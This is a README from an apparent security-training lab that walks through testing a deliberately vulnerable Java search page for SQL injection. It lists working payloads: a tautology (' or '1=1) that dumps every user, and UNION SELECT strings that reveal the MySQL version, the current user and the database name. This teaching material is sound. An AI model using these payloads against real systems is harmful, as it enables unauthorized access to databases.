Security-Champions-Beta/SlimFixTheCodes/Java-SQLinjection-Union-1/README.md

 Step 5: Create some dummy users

-Step 6: In the search bar search for any user you have created based on first name

-Step 7: Now test for SQL Injection payload

-' or '1=1Copy
-| This should return all the users you have created

-Step 8: You can also try with these payloads

-To get mysql version

-a' UNION ALL SELECT null,version(),null,null'Copy
-You will see a mysql version under the header First Name

-To get the logged in mysql user

-a' UNION ALL SELECT null,CURRENT_USER(),null,null'Copy You will see the current mysql user under the header First Name

-To get the current database

 a' UNION ALL SELECT null,DATABASE(),null,null'Copy
 You will see the database name under the header First Name